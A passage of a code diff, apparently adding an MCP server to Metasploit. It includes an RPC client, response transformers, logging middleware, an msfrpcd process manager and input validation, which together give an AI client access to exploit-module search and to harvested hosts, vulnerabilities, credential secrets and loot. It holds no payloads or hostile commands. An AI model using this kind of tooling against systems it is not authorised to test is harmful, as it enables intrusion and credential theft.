                 LOG_SOURCE, LOG_WARN)
            authenticate(@user, @password)
          rescue AuthenticationError => auth_e
            wlog({ message: "Re-authentication failed: #{auth_e.message}" },
                 LOG_SOURCE, LOG_WARN)
            if @retry_count < @max_retries
              @retry_count += 1
              @token = nil
              retry
            end
            raise AuthenticationError, "Unable to authenticate after #{@retry_count} attempts: #{auth_e.message}"
          end
          # Retry the original request with new token
          retry
        end
      rescue Msf::MCP::Error => e
        elog({ message: 'MessagePack API call error', context: { error: e.message } },
             LOG_SOURCE, LOG_ERROR)
        raise
      ensure
        @retry_count = 0
      end

      # Search for Metasploit modules
      # @param query [String] Search query
      # @return [Array<Hash>] Module metadata
      def search_modules(query)
        call_api('module.search', [query])
      end

      # Get module information
      # @param type [String] Module type ('exploit', 'auxiliary', 'post', etc.)
      # @param name [String] Module name
      # @return [Hash] Module information
      def module_info(type, name)
        call_api('module.info', [type, name])
      end

      # Get hosts from database
      # @param options [Hash] Query options (workspace, limit, offset, etc.)
      # @return [Hash] Response with 'hosts' array
      def db_hosts(options = {})
        call_api('db.hosts', [options])
      end

      # Get services from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'services' array
      def db_services(options = {})
        call_api('db.services', [options])
      end

      # Get vulnerabilities from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'vulns' array
      def db_vulns(options = {})
        call_api('db.vulns', [options])
      end

      # Get notes from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'notes' array
      def db_notes(options = {})
        call_api('db.notes', [options])
      end

      # Get credentials from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'creds' array
      def db_creds(options = {})
        call_api('db.creds', [options])
      end

      # Get loot from database
      # @param options [Hash] Query options
      # @return [Hash] Response with 'loots' array
      def db_loot(options = {})
        call_api('db.loots', [options])
      end

      # Shutdown client and cleanup
      def shutdown
        @token = nil
        @user = nil
        @password = nil
        @http&.finish if @http&.started?
        @http = nil
      end

      private

      # Send HTTP POST request with MessagePack payload
      # @param request_array [Array] Request data
      # @return [Hash, Array] Parsed response
      # @raise [AuthenticationError] If the token is not valid
      # @raise [APIError] If the Metasploit API returns an error
      # @raise [ConnectionError] If connection fails or the body cannot be decoded
      def send_request(request_array)
        # Create HTTP client if needed
        unless @http
          @http = Net::HTTP.new(@host, @port)
          @http.use_ssl = @ssl
          @http.verify_mode = OpenSSL::SSL::VERIFY_NONE if @ssl
        end
        # Encode request with MessagePack
        request_body = request_array.to_msgpack
        # Create POST request
        request = Net::HTTP::Post.new(@endpoint)
        request['Content-Type'] = 'binary/message-pack'
        request.body = request_body
        dlog({
          message: 'MessagePack request',
          context: { method: request.method, endpoint: @endpoint, body: sanitize_request_array(request_array) }
        }, LOG_SOURCE, LOG_DEBUG)
        # Send request and parse response
        begin
          response = @http.request(request)
          parsed = case response.code.to_i
                   when 200
                     MessagePack.unpack(response.body)
                   when 401
                     error_data = MessagePack.unpack(response.body) rescue { 'error_message' => 'Authentication error' }
                     error_msg = error_data['error_message'] || error_data['error_string'] || 'Authentication error'
                     raise AuthenticationError, error_msg
                   when 500
                     error_data = MessagePack.unpack(response.body) rescue { 'error_message' => 'Internal server error' }
                     error_msg = error_data['error_message'] || error_data['error_string'] || 'Internal server error'
                     raise APIError, error_msg
                   else
                     raise ConnectionError, "HTTP #{response.code}: #{response.message}"
                   end
          dlog({
            message: 'MessagePack response',
            context: { status: response.code, body: parsed }
          }, LOG_SOURCE, LOG_DEBUG)
          parsed
        rescue MessagePack::UnpackError => e
          # A 200 body that fails to decode means the endpoint is not speaking
          # MessagePack (wrong port/endpoint, proxy error page, etc.). Wrap it
          # so callers only ever see the documented Msf::MCP error classes.
          raise ConnectionError, "Invalid MessagePack response from Metasploit RPC: #{e.message}"
        rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH => e
          raise ConnectionError, "Cannot connect to Metasploit RPC: #{e.message}"
        rescue SocketError => e
          raise ConnectionError, "Network error: #{e.message}"
        rescue Timeout::Error => e
          raise ConnectionError, "Request timeout: #{e.message}"
        rescue EOFError => e
          raise ConnectionError, "Empty response from Metasploit RPC: #{e.message}"
        end
      end

      REDACTED = '[REDACTED]'

      # Sanitize request array for logging by redacting sensitive positional values
      #
      # For auth.login requests: redacts the password (last element)
      # For API calls: redacts the token (second element)
      #
      # @param request_array [Array] Raw request array
      # @return [Array] Sanitized copy with sensitive values redacted
      def sanitize_request_array(request_array)
        sanitized = request_array.dup
        if sanitized[0] == 'auth.login'
          sanitized[-1] = REDACTED
        elsif sanitized.length > 1
          sanitized[1] = REDACTED
        end
        sanitized
      end
    end
  end
end
@@ -0,0 +1,216 @@
# frozen_string_literal: true

require 'time'

module Msf::MCP
  module Metasploit
    # Transforms Metasploit RPC responses into MCP-compatible format
    # Adds metadata, converts field names, and formats timestamps
    class ResponseTransformer
      # Transform module search results
      # @param modules [Array<Hash>] Raw module data from Metasploit
      # @return [Array<Hash>] Transformed modules with MCP metadata
      def self.transform_modules(modules)
        return [] unless modules.is_a?(Array)

        modules.map do |mod|
          {
            name: mod['name'] || mod['fullname'],
            type: mod['type'],
            fullname: mod['fullname'],
            rank: mod['rank'],
            disclosure_date: mod['disclosuredate']
          }.compact
        end
      end

      # Transform module info response
      # @param info [Hash] Raw module info from Metasploit
      # @return [Hash] Transformed info with MCP metadata
      def self.transform_module_info(info)
        return {} unless info.is_a?(Hash)

        {
          type: info['type'],
          name: info['name'],
          fullname: info['fullname'],
          rank: info['rank'],
          disclosure_date: info['disclosuredate'],
          description: info['description'],
          license: info['license'],
          filepath: info['filepath']&.sub(/^.*modules\//, 'modules/'), # Don't expose the install path
          architectures: info['arch'],
          platforms: info['platform'],
          authors: info['authors'],
          privileged: info['privileged'],
          has_check_method: info['check'],
          # TODO: write transformer for default_options
          default_options: info['default_options'],
          references: transform_references(info['references']),
          targets: info['targets'],
          default_target: info['default_target'],
          stance: info['stance'],
          actions: info['actions'],
          default_action: info['default_action'],
          # TODO: write transformer for options
          options: info['options']
        }.compact
      end

      # Transform hosts response
      # @param response [Hash] Raw response with 'hosts' array
      # @return [Array<Hash>] Transformed hosts with MCP metadata
      def self.transform_hosts(response)
        return [] unless response.is_a?(Hash) && response['hosts'].is_a?(Array)

        response['hosts'].map do |host|
          {
            created_at: format_timestamp(host['created_at']),
            address: host['address'],
            mac_address: host['mac'],
            hostname: host['name'],
            state: host['state'],
            os_name: host['os_name'],
            os_flavor: host['os_flavor'],
            os_service_pack: host['os_sp'],
            os_language: host['os_lang'],
            updated_at: format_timestamp(host['updated_at']),
            purpose: host['purpose'],
            info: host['info']
          }.compact
        end
      end

      # Transform services response
      # @param response [Hash] Raw response with 'services' array
      # @return [Array<Hash>] Transformed services
      def self.transform_services(response)
        return [] unless response.is_a?(Hash) && response['services'].is_a?(Array)

        response['services'].map do |service|
          {
            host_address: service['host'],
            created_at: format_timestamp(service['created_at']),
            updated_at: format_timestamp(service['updated_at']),
            port: service['port'],
            protocol: service['proto'],
            state: service['state'],
            name: service['name'],
            info: service['info'],
          }.compact
        end
      end

      # Transform vulnerabilities response
      # @param response [Hash] Raw response with 'vulns' array
      # @return [Array<Hash>] Transformed vulnerabilities
      def self.transform_vulns(response)
        return [] unless response.is_a?(Hash) && response['vulns'].is_a?(Array)

        response['vulns'].map do |vuln|
          {
            host: vuln['host'],
            port: vuln['port'],
            protocol: vuln['proto'],
            name: vuln['name'],
            references: parse_refs(vuln['refs']),
            created_at: format_timestamp(vuln['time'])
          }.compact
        end
      end

      # Transform notes response
      # @param response [Hash] Raw response with 'notes' array
      # @return [Array<Hash>] Transformed notes
      def self.transform_notes(response)
        return [] unless response.is_a?(Hash) && response['notes'].is_a?(Array)

        response['notes'].map do |note|
          {
            host: note['host'],
            service_name_or_port: note['service'],
            note_type: note['type'] || note['ntype'],
            data: note['data'],
            created_at: format_timestamp(note['time'])
          }.compact
        end
      end

      # Transform credentials response
      # @param response [Hash] Raw response with 'creds' array
      # @return [Array<Hash>] Transformed credentials
      def self.transform_creds(response)
        return [] unless response.is_a?(Hash) && response['creds'].is_a?(Array)

        response['creds'].map do |cred|
          {
            host: cred['host'],
            port: cred['port'],
            protocol: cred['proto'],
            service_name: cred['sname'],
            user: cred['user'],
            secret: cred['pass'],
            type: cred['type'],
            updated_at: format_timestamp(cred['updated_at'])
          }.compact
        end
      end

      # Transform loot response
      # @param response [Hash] Raw response with 'loots' array
      # @return [Array<Hash>] Transformed loot
      def self.transform_loot(response)
        return [] unless response.is_a?(Hash) && response['loots'].is_a?(Array)

        response['loots'].map do |loot|
          {
            host: loot['host'],
            service_name_or_port: loot['service'],
            loot_type: loot['ltype'],
            content_type: loot['ctype'],
            name: loot['name'],
            info: loot['info'],
            data: loot['data'],
            created_at: format_timestamp(loot['created_at']),
            updated_at: format_timestamp(loot['updated_at'])
          }.compact
        end
      end

      # --- Internal helpers -------------------------------------------------
      # NOTE: a bare `private` has no effect on singleton methods defined with
      # `def self.`; the original code relied on it and these helpers were
      # silently public. `private_class_method` (below) actually hides them.

      # Convert Unix epoch timestamp to ISO 8601 format
      # @param timestamp [Integer, nil] Unix timestamp
      # @return [String, nil] ISO 8601 formatted string
      def self.format_timestamp(timestamp)
        return nil if timestamp.nil? || timestamp.to_i.zero?

        Time.at(timestamp.to_i).utc.iso8601
      end

      # Transform references array
      # @param refs [Array, nil] References from Metasploit
      # @return [Array<Hash>, nil] Transformed references
      def self.transform_references(refs)
        return nil unless refs.is_a?(Array)

        refs.map do |ref|
          if ref.is_a?(Array) && ref.length == 2
            { type: ref[0], value: ref[1] }
          else
            ref
          end
        end
      end

      # Parse comma-separated reference string
      # Note there can have some issues if the ref values themselves contain commas,
      # but it is the way the MSF RPC API returns them.
      # @param refs [String, nil] Comma-separated refs
      # @return [Array<String>, nil] Array of references
      def self.parse_refs(refs)
        return nil if refs.nil? || refs.empty?

        refs.to_s.split(',').map(&:strip).reject(&:empty?)
      end

      private_class_method :format_timestamp, :transform_references, :parse_refs
    end
  end
end
@@ -0,0 +1,187 @@
# frozen_string_literal: true
module Msf::MCP
module Middleware
##
# Rack middleware that logs MCP HTTP request/response details via Rex logging.
#
# Focuses on the HTTP transport layer: request method, status code, session ID,
# content type, and round-trip timing. For POST requests it also extracts
# JSON-RPC fields (method, id, params) and response result/error to provide
# DEBUG-level visibility into the exchange.
#
# MCP-level business details (tool names, tool durations, and structured
# results) are handled by the SDK's +around_request+ callback configured
# in Server, avoiding duplication.
#
# @example Usage in a Rack::Builder
# Rack::Builder.new do
# use Msf::MCP::Middleware::RequestLogger
# run transport
# end
#
class RequestLogger
##
# @param app [#call] The next Rack application in the middleware stack
#
# Keep a reference to the downstream Rack app; the middleware holds no
# other per-instance state.
def initialize(app)
  @app = app
end
##
# Process the request, delegating to the next Rack app and logging
# transport-level details after the response is produced.
#
# @param env [Hash] The Rack environment
# @return [Array] The Rack response triplet [status, headers, body]
#
def call(env)
  incoming = Rack::Request.new(env)
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  result = @app.call(env)
  duration = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
  # Log after the downstream app has produced the response, then pass the
  # untouched triplet back up the stack.
  log_exchange(incoming, result, duration)
  result
end
private
##
# Log a single request/response entry at the HTTP transport level.
#
# Dispatches to {#log_post_exchange} for POST requests (which extracts
# JSON-RPC fields). GET, DELETE, and other methods are logged directly
# with status and timing information.
#
# @param request [Rack::Request] The incoming HTTP request
# @param response [Array] The Rack response [status, headers, body]
# @param elapsed [Float] Wall-clock seconds for the round-trip
#
def log_exchange(request, response, elapsed)
  status, headers, _body = response
  session_id = request.env['HTTP_MCP_SESSION_ID'] || headers&.fetch('Mcp-Session-Id', nil)
  elapsed_ms = (elapsed * 1000).round(2)
  context = { elapsed_ms: elapsed_ms }
  context[:session_id] = session_id if session_id

  verb = request.request_method
  # POST carries JSON-RPC payloads and gets its own richer logging path.
  if verb == 'POST'
    log_post_exchange(request, response, context)
    return
  end

  context[:response] = build_response_context(response)
  case verb
  when 'GET'
    ilog({ message: "SSE stream opened (#{elapsed_ms}ms)", context: context }, LOG_SOURCE, LOG_INFO)
  when 'DELETE'
    ilog({ message: "Session deleted (#{elapsed_ms}ms)", context: context }, LOG_SOURCE, LOG_INFO)
  else
    dlog({ message: "HTTP #{verb} #{status} (#{elapsed_ms}ms)", context: context }, LOG_SOURCE, LOG_DEBUG)
  end
end
##
# Log a POST exchange with JSON-RPC params and response result/error
# nested under :request and :response keys.
#
# For streaming responses (Proc body), the result is not available here —
# it is logged by the +around_request+ callback in Server instead.
#
# Distinguishes between:
# - Notifications (no id): logged at DEBUG since the SDK instrumentation
# does not fire for these
# - Requests with HTTP errors: logged at ERROR with the error details
# - Normal requests: logged at DEBUG with params and result
# (the +around_request+ callback provides the INFO-level business log)
#
# @param request [Rack::Request] The incoming HTTP request
# @param response [Array] The Rack response [status, headers, body]
# @param context [Hash] Pre-built context hash with session_id and elapsed_ms
#
def log_post_exchange(request, response, context)
  context[:request] = {}
  jsonrpc = extract_jsonrpc_fields(request)
  if jsonrpc
    # BUG FIX: use nil-checks instead of truthiness. A JSON-RPC id of 0 is a
    # valid id; with the old `if jsonrpc[:id]` it was dropped and the request
    # was then misclassified (and logged) as a notification below.
    context[:request][:method] = jsonrpc[:method] unless jsonrpc[:method].nil?
    context[:request][:id] = jsonrpc[:id] unless jsonrpc[:id].nil?
    context[:request][:params] = jsonrpc[:params] unless jsonrpc[:params].nil?
  end
  context[:response] = build_response_context(response)
  response_body = extract_response_body(response)
  if response_body
    # BUG FIX: a JSON-RPC result of `false` is a legitimate value and must
    # still appear in the log context, so test for nil rather than truthiness.
    context[:response][:result] = response_body[:result] unless response_body[:result].nil?
    context[:response][:error] = response_body[:error] unless response_body[:error].nil?
  end
  method_name = context[:request][:method] || 'unknown'
  if context[:request][:id].nil? && context[:request][:method]
    # Notification — no instrumentation fires for these
    dlog({ message: "Notification: #{method_name} #{context[:response][:status]} (#{context[:elapsed_ms]}ms)", context: context }, LOG_SOURCE, LOG_DEBUG)
  elsif context[:response][:status] >= 400
    elog({ message: "HTTP #{context[:response][:status]}: #{method_name} (#{context[:elapsed_ms]}ms)", context: context }, LOG_SOURCE, LOG_ERROR)
  else
    dlog({ message: "HTTP #{context[:response][:status]}: #{method_name} id=#{context[:request][:id]} (#{context[:elapsed_ms]}ms)", context: context }, LOG_SOURCE, LOG_DEBUG)
  end
end
##
# Build the response portion of the log context from the Rack response.
#
# @param response [Array] The Rack response [status, headers, body]
# @return [Hash] Response context with :status and :content_type
#
# Assemble the response half of a log-context hash from a Rack triple.
# Always records :status; adds :content_type only when the header hash
# exists and carries a Content-Type entry.
def build_response_context(response)
  status, headers, _body = response
  context = { status: status }
  if headers && headers.key?('Content-Type')
    context[:content_type] = headers['Content-Type']
  end
  context
end
##
# Extract JSON-RPC method, id, and params from the request body.
#
# Rewinds before and after reading so downstream handlers can still
# consume the body.
#
# @param request [Rack::Request] The incoming HTTP request
# @return [Hash, nil] Parsed fields (:method, :id, :params), or nil on
# parse failure
#
def extract_jsonrpc_fields(request)
  request.body.rewind
  body = request.body.read
  request.body.rewind
  parsed = JSON.parse(body)
  # BUG FIX: valid JSON that is not an object (e.g. a batch array "[...]" or a
  # bare number) previously raised TypeError/NoMethodError on parsed['method'],
  # which was not rescued. Treat non-object payloads as unextractable.
  return nil unless parsed.is_a?(Hash)
  { method: parsed['method'], id: parsed['id'], params: parsed['params'] }
rescue JSON::ParserError
  nil
end
##
# Extract result or error from the response body.
#
# Only parses Array bodies (direct JSON responses). SSE stream responses
# (Proc bodies) are not parseable here — their results are logged by the
# +around_request+ callback in Server.
#
# @param response [Array] The Rack response [status, headers, body]
# @return [Hash, nil] Parsed fields (:result, :error), or nil if the body
# is empty, non-Array, or unparseable
#
def extract_response_body(response)
  _status, _headers, body = response
  return nil unless body.is_a?(Array) && !body.empty?
  # Join all chunks: a JSON document split across multiple body parts was
  # previously truncated to body.first and failed to parse.
  parsed = JSON.parse(body.join)
  # BUG FIX: valid JSON that is not an object (e.g. an array) previously
  # raised TypeError on parsed['result'], which was not rescued.
  return nil unless parsed.is_a?(Hash)
  { result: parsed['result'], error: parsed['error'] }
rescue JSON::ParserError
  nil
end
end
end
end
+302
View File
@@ -0,0 +1,302 @@
# frozen_string_literal: true
require 'securerandom'
require 'socket'
module Msf::MCP
# Manages the lifecycle of a Metasploit RPC server process.
#
# Probes the configured RPC port, auto-starts the server via Process.spawn
# of msfrpcd, and cleans up the child process on shutdown.
class RpcManager
  # Hostnames considered local: auto-start is only possible on these.
  LOCALHOST_HOSTS = %w[localhost 127.0.0.1 ::1].freeze
  # Default seconds to wait for the RPC server to come up.
  DEFAULT_WAIT_TIMEOUT = 30
  # Default seconds between availability probes.
  DEFAULT_WAIT_INTERVAL = 1
  # Seconds allowed after SIGTERM before escalating to SIGKILL.
  STOP_GRACE_PERIOD = 5

  # @return [Integer, nil] PID of the managed msfrpcd child, or nil when unmanaged
  attr_reader :rpc_pid

  # @param config [Hash] Application configuration hash (reads config[:msf_api])
  # @param output [IO] Output stream for status messages
  def initialize(config:, output:)
    @config = config
    @output = output
    @rpc_pid = nil
    @rpc_managed = false
  end

  # Whether this manager started and is managing an RPC server process.
  #
  # @return [Boolean]
  def rpc_managed?
    @rpc_managed
  end

  # Probe the configured RPC port to check if a server is listening.
  #
  # A successful TCP connect (immediately closed) counts as "available";
  # no protocol-level handshake is attempted.
  #
  # @return [Boolean]
  def rpc_available?
    host = @config[:msf_api][:host]
    port = @config[:msf_api][:port]
    socket = Rex::Socket::Tcp.create(
      'PeerHost' => host,
      'PeerPort' => port
    )
    socket.close
    dlog({ message: "RPC server is available at #{Rex::Socket.to_authority(host, port)}" },
         LOG_SOURCE, LOG_DEBUG)
    true
  rescue Rex::ConnectionError
    false
  end

  # Whether auto-start is enabled based on config, API type, and host.
  #
  # Auto-start is only supported for:
  # - MessagePack API type (not JSON-RPC)
  # - Localhost connections (cannot start a remote RPC server)
  # - When auto_start_rpc config is not explicitly false
  #
  # @return [Boolean]
  def auto_start_enabled?
    return false if @config[:msf_api][:type] != 'messagepack'
    return false unless localhost?
    return false if @config[:msf_api][:auto_start_rpc] == false
    true
  end

  # Start the Metasploit RPC server by spawning msfrpcd.
  #
  # Credentials are passed via environment variables to avoid exposing
  # them on the command line. stdout/stderr of the child are discarded.
  #
  # @return [void]
  # @raise [Msf::MCP::Metasploit::RpcStartupError] If the server cannot be started
  def start_rpc_server
    if @rpc_managed
      @output.puts 'RPC server is already managed by this process'
      return
    end
    @output.puts 'Starting Metasploit RPC server...'
    ilog({ message: 'Starting Metasploit RPC server' },
         LOG_SOURCE, LOG_INFO)
    unless File.executable?(MSFRPCD_PATH)
      raise Msf::MCP::Metasploit::RpcStartupError,
            'msfrpcd executable not found. Cannot auto-start RPC server.'
    end
    args = build_msfrpcd_args
    env = {
      'MSF_RPC_USER' => @config[:msf_api][:user].to_s,
      'MSF_RPC_PASS' => @config[:msf_api][:password].to_s
    }
    pid = Process.spawn(env, MSFRPCD_PATH, *args, %i[out err] => File::NULL)
    @rpc_pid = pid
    @rpc_managed = true
    @output.puts "RPC server started via msfrpcd (PID: #{pid})"
  end

  # Wait for the RPC server to become available.
  #
  # @param timeout [Integer] Maximum seconds to wait (default: 30)
  # @param interval [Integer] Seconds between probes (default: 1)
  # @return [true] When the server becomes available
  # @raise [Msf::MCP::Metasploit::ConnectionError] If timeout is reached
  # @raise [Msf::MCP::Metasploit::RpcStartupError] If the managed process exits
  def wait_for_rpc(timeout: DEFAULT_WAIT_TIMEOUT, interval: DEFAULT_WAIT_INTERVAL)
    deadline = Time.now + timeout
    loop do
      if rpc_available?
        @output.puts 'RPC server is ready'
        return true
      end
      # Fail fast if our own child died instead of waiting out the timeout.
      check_managed_process_alive! if @rpc_managed
      if Time.now >= deadline
        raise Msf::MCP::Metasploit::ConnectionError,
              "Timed out waiting for RPC server after #{timeout} seconds"
      end
      @output.puts 'Waiting for RPC server to become available...'
      sleep(interval)
    end
  end

  # Stop the managed RPC server process (SIGTERM, then SIGKILL after the
  # grace period). No-op when this process does not manage the server.
  #
  # @return [void]
  def stop_rpc_server
    return unless @rpc_managed
    @output.puts 'Stopping managed RPC server...'
    ilog({ message: "Stopping managed RPC server (PID: #{@rpc_pid})" },
         LOG_SOURCE, LOG_INFO)
    begin
      Process.kill('TERM', @rpc_pid)
      graceful_wait
    rescue Errno::ESRCH
      # Process already dead — that's fine
    rescue Errno::EPERM
      @output.puts "Warning: no permission to stop RPC process #{@rpc_pid}"
    end
    @rpc_pid = nil
    @rpc_managed = false
  end

  # Ensure an RPC server is available, auto-starting if needed.
  #
  # When the RPC server is already listening, verifies that credentials
  # (or a token for JSON-RPC) are available for the caller to authenticate.
  #
  # When the server is not available, auto-start is attempted only for
  # MessagePack on localhost with auto_start_rpc enabled. Random
  # credentials are generated when none are provided.
  #
  # @return [void]
  # @raise [Msf::MCP::Metasploit::RpcStartupError] If the server cannot be
  #   reached and auto-start is not possible, or if the server is running
  #   but no credentials/token were provided
  def ensure_rpc_available
    if rpc_available?
      @output.puts 'Metasploit RPC server is already running'
      validate_credentials_for_existing_server!
      return
    end
    if @config[:msf_api][:type] == 'json-rpc'
      raise Msf::MCP::Metasploit::RpcStartupError,
            'RPC server is not running and auto-start is not supported for JSON-RPC API type.'
    end
    unless localhost?
      message = "RPC server is not available at #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]}."
      # BUG FIX: this hint was guarded by `auto_start_enabled?`, which can never
      # be true here because auto_start_enabled? itself requires localhost?.
      # Test the auto-start *intent* (API type + config flag) instead, so the
      # hint appears exactly when auto-start would have applied on a local host.
      if @config[:msf_api][:type] == 'messagepack' && @config[:msf_api][:auto_start_rpc] != false
        message << ' Cannot auto-start RPC on remote hosts. Please start the RPC server manually.'
      end
      raise Msf::MCP::Metasploit::RpcStartupError, message
    end
    unless auto_start_enabled?
      raise Msf::MCP::Metasploit::RpcStartupError,
            "RPC server is not running on #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]} " \
            'and auto-start is disabled.'
    end
    generate_random_credentials unless credentials_provided?
    start_rpc_server
    wait_for_rpc
  end

  private

  # Absolute path to msfrpcd relative to the framework root.
  MSFRPCD_PATH = File.join(__dir__, '../../../..', 'msfrpcd').freeze

  # Build command-line arguments for msfrpcd.
  #
  # Note: credentials are passed via environment variables (MSF_RPC_USER,
  # MSF_RPC_PASS) rather than command-line arguments for security.
  #
  # @return [Array<String>]
  def build_msfrpcd_args
    args = ['-f'] # foreground mode
    args.push('-a', @config[:msf_api][:host].to_s)
    args.push('-p', @config[:msf_api][:port].to_s)
    args.push('-S') if @config[:msf_api][:ssl] == false # -S disables SSL
    args
  end

  # Check whether the host is a localhost address.
  #
  # @return [Boolean]
  def localhost?
    LOCALHOST_HOSTS.include?(@config[:msf_api][:host].to_s.downcase)
  end

  # Whether both user and password are present (non-blank) in the configuration.
  #
  # @return [Boolean]
  def credentials_provided?
    user = @config[:msf_api][:user]
    password = @config[:msf_api][:password]
    !user.to_s.strip.empty? && !password.to_s.strip.empty?
  end

  # Whether the BEARER token is present (non-blank) in the configuration.
  #
  # @return [Boolean]
  def token_provided?
    token = @config[:msf_api][:token]
    !token.to_s.strip.empty?
  end

  # Verify that the caller has credentials to authenticate with an
  # already-running RPC server. For MessagePack this means user+password;
  # for JSON-RPC this means a bearer token.
  #
  # @raise [Msf::MCP::Metasploit::RpcStartupError] If required credentials
  #   are missing
  def validate_credentials_for_existing_server!
    if @config[:msf_api][:type] == 'json-rpc'
      return if token_provided?
      raise Msf::MCP::Metasploit::RpcStartupError,
            'RPC server is already running but no token was provided. ' \
            'Use --token option or MSF_API_TOKEN environment variable.'
    else
      return if credentials_provided?
      raise Msf::MCP::Metasploit::RpcStartupError,
            'RPC server is already running but no credentials were provided. ' \
            'Use --user and --password options or MSF_API_USER and MSF_API_PASSWORD environment variables.'
    end
  end

  # Generate random credentials and write them into the config hash so the
  # spawned server and the subsequent client login agree on them.
  #
  # @return [void]
  def generate_random_credentials
    @config[:msf_api][:user] = SecureRandom.hex(8)
    @config[:msf_api][:password] = SecureRandom.hex(16)
    @output.puts 'Generated random credentials for auto-started RPC server'
    ilog({ message: 'Generated random credentials for auto-started RPC server' },
         LOG_SOURCE, LOG_INFO)
  end

  # Check if the managed child process is still alive; reaps it and raises
  # RpcStartupError if it has exited.
  def check_managed_process_alive!
    return unless @rpc_pid
    result = Process.waitpid(@rpc_pid, Process::WNOHANG)
    return unless result
    @rpc_pid = nil
    @rpc_managed = false
    raise Msf::MCP::Metasploit::RpcStartupError, 'RPC server process exited unexpectedly'
  end

  # Wait for the child process to exit after SIGTERM, escalating to
  # SIGKILL if it does not exit within STOP_GRACE_PERIOD.
  #
  # Polls in short intervals instead of sleeping the whole grace period,
  # so a promptly-exiting child is reaped without the full delay.
  def graceful_wait
    deadline = Time.now + STOP_GRACE_PERIOD
    while Time.now < deadline
      return if Process.waitpid(@rpc_pid, Process::WNOHANG)
      sleep(0.1)
    end
    # Process did not exit within the grace period; escalate to SIGKILL
    # and reap it synchronously.
    Process.kill('KILL', @rpc_pid)
    Process.waitpid(@rpc_pid, 0)
  end
end
end
@@ -0,0 +1,197 @@
# frozen_string_literal: true
require 'ipaddr'
module Msf::MCP
module Security
class InputValidator
  # Pagination defaults and bounds shared by the MCP tools.
  LIMIT_DEFAULT = 100
  LIMIT_MIN = 1
  LIMIT_MAX = 1000

  # Generic parameter validation against a constraint
  #
  # Dispatches based on the constraint type:
  # - Array  → value must be included in the list (enum)
  # - Range  → value must be an integer within the range, or a Range whose
  #            bounds are within the constraint (constraint must be integer-bounded)
  # - Regexp → value (via .to_s) must match the pattern
  #
  # @param name [String] Parameter name (used in error messages)
  # @param value [Object] Value to validate
  # @param constraint [Array, Range, Regexp] Allowed values, range, or pattern
  # @param allow_nil [Boolean] Whether nil/empty values are allowed (default: false)
  # @param max_size [Integer] (optional) Maximum length for string values (only applies to Regexp constraints)
  # @return [true] If valid
  # @raise [ValidationError] If the value fails the constraint
  # @raise [ArgumentError] If the constraint itself is unsupported or malformed
  def self.validate_parameter!(name, value, constraint, allow_nil: false, max_size: nil)
    if allow_nil
      return true if value.nil?
      return true if value.respond_to?(:empty?) && value.empty?
    else
      raise ValidationError, "#{name} cannot be nil" if value.nil?
      raise ValidationError, "#{name} cannot be empty" if value.respond_to?(:empty?) && value.empty?
    end
    case constraint
    when Array
      unless constraint.include?(value)
        raise ValidationError, "Invalid #{name}: #{value.inspect}. Must be one of: #{constraint.join(', ')}"
      end
    when Range
      # A non-integer constraint is a programming error, not a user-input error.
      unless constraint.first.is_a?(Integer) && constraint.last.is_a?(Integer)
        raise ArgumentError, "Range constraint must be a range of integers, got #{constraint.first.class}..#{constraint.last.class}"
      end
      if value.is_a?(Range)
        begin
          int_first = Integer(value.first)
          int_last = Integer(value.last)
        rescue TypeError, ArgumentError
          raise ValidationError, "#{name} must have integer bounds: #{value.inspect}"
        end
        unless constraint.cover?(int_first..int_last)
          raise ValidationError, "#{name} must be between #{constraint.min} and #{constraint.max}: #{int_first}..#{int_last}"
        end
      else
        begin
          int_value = Integer(value)
        rescue TypeError, ArgumentError
          raise ValidationError, "#{name} must be an integer: #{value.inspect}"
        end
        unless constraint.cover?(int_value)
          raise ValidationError, "#{name} must be between #{constraint.min} and #{constraint.max}: #{value}"
        end
      end
    when Regexp
      string_value = value.to_s
      # Length is checked before the (potentially backtracking) regex match.
      if max_size && string_value.length > max_size
        raise ValidationError, "#{name} too long (max #{max_size} characters)"
      end
      unless string_value.match?(constraint)
        raise ValidationError, "Invalid #{name} format: #{value}"
      end
    else
      raise ArgumentError, "Unsupported constraint type: #{constraint.class}"
    end
    true
  end

  # Validate IP address or CIDR range
  #
  # @param addr [String] IP address or CIDR (e.g., "192.168.1.1" or "192.168.1.0/24")
  # @return [true] If valid (nil/empty input is treated as valid/absent)
  # @raise [ValidationError] If invalid
  def self.validate_ip_address!(addr)
    return true if addr.nil? || addr.empty?
    begin
      IPAddr.new(addr)
      true
    rescue IPAddr::Error
      # BUG FIX: previously rescued only IPAddr::InvalidAddressError, which let
      # IPAddr::InvalidPrefixError (e.g. "10.0.0.0/33") escape unhandled.
      # IPAddr::Error is the common ancestor of both.
      raise ValidationError, "Invalid IP address or CIDR: #{addr}"
    end
  end

  # Validate port or port range
  #
  # @param range [String, Integer] Port number or range (e.g., "80" or "80-443")
  # @return [true] If valid (nil/empty input is treated as valid/absent)
  # @raise [ValidationError] If invalid
  def self.validate_port_range!(range)
    return true if range.nil? || range.to_s.empty?
    range_str = range.to_s
    # Match a range like "80-443": one alnum token on each side of the dash.
    # Non-numeric tokens are rejected below when Integer() raises.
    if range_str.match?(/\A\s*[[:alnum:]]+-[[:alnum:]]+\s*\z/)
      begin
        start_port, end_port = range_str.split('-', 2).map { |p| Integer(p.strip) }
      rescue TypeError, ArgumentError
        raise ValidationError, "Port range must have integer bounds: #{range_str}"
      end
      validate_parameter!('Port range', start_port..end_port, 1..65535)
    else
      validate_parameter!('Port', range_str, 1..65535)
    end
    true
  end

  # Validate query string for module search
  #
  # @param query [String] Search query (printable characters, max 500)
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_search_query!(query)
    validate_parameter!('Search query', query, /\A[[:print:]]+\z/, allow_nil: false, max_size: 500)
  end

  # Validate limit parameter for pagination
  #
  # @param limit [Integer] Limit value (nil allowed)
  # @return [true] If valid
  # @raise [ValidationError] If invalid
  def self.validate_limit!(limit)
    validate_parameter!('Limit', limit, LIMIT_MIN..LIMIT_MAX, allow_nil: true)
  end

  # Validate offset parameter for pagination
  #
  # @param offset [Integer] Offset value (nil allowed)
  # @return [true] If valid
